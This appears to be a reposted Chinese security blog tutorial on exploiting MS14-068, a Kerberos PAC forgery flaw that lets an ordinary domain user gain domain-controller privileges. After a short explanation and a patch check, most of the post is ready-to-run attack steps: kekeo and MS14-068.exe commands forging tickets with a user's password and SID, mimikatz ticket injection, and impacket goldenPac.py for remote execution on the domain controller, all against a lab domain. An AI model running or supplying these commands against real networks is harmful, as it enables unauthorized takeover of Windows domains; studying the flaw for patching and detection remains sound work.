域渗透|MS14-068

admin 2024年4月3日09:56:48评论1 views字数 1534阅读5分6秒阅读模式

MS14-068

MS14-068

https://www.se7ensec.cn/2021/10/20/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberos%E5%9F%9F%E8%AE%A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%90/

MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。

这个漏洞中主要的问题是存在于KDC会根据客户端指定PAC中数字签名的加密算法,以及PAC的加密算法,来校验PAC的合法性。这使得攻击者可通过伪造PAC,修改PAC中的SID,导致KDC判断攻击者为高权限用户,从而导致权限提升漏洞的产生。

漏洞补丁地址: https://technet.microsoft.com/zh-cn/library/security/MS14-068

利用方式

MS14-068对应的补丁为KB3011780,可在域控上通过systeminfo查看是否安装此补丁。

1
systeminfo|find "3011780"

keoko

1
2
klist purge清除票据
kekeo "exploit::ms14068 /domain:rootkit.org /user:sqladmin /password:Admin12345 /ptt" "exit"

Pykek

py:https://github.com/mubix/pykek
exe:https://github.com/ianxtianxt/MS14-068

参数说明:

-u 域账号@域名称
-p 为当前用户的密码
-s 为当前用户的SID值,可以通过whoami/all来获取用户的SID值
-d 为当前域的域控
–rc4 为当前用户的Hash

  1. 通过dir来访问域控的共享文件夹,提示拒绝访问。
    1
    dir \\OWA2013.rootkit.org\c$
  2. 生成票据
    1
    MS14-068.exe -u [email protected] -p Admin12345 -s S-1-5-21-3759881954-2993291187-3577547808-1613 -d OWA2013.rootkit.org
  3. 脚本执行成功会在当前目录下生成一个ccache文件,票据导入之前cmd下使用命令klist purge,或者在mimikatz中使用kerberos::purge删除当前缓存的kerberos票据。
    1
    klist purge
  4. 使用mimikatz导入生成的ccache文件
    1
    mimikatz "kerberos::ptc [email protected]" exit

    再次dir访问域控共享就可以成功访问。

    goldenPac

impacket工具包里面的goldenPac.py,这个工具是结合ms14-068psexec的产物,利用起来十分顺手。

1
python goldenPac.py -dc-ip 192.168.3.144 -target-ip 192.168.3.144 rootkit.org/sqladmin:[email protected]

参考

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-068
https://daiker.gitbook.io/windows-protocol/kerberos/3
https://cloud.tencent.com/developer/article/1760132
https://www.cnblogs.com/backlion/p/6820744.html

- source:se7ensec.cn

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月3日09:56:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   域渗透|MS14-068https://cn-sec.com/archives/2624882.html

发表评论

匿名网友 填写信息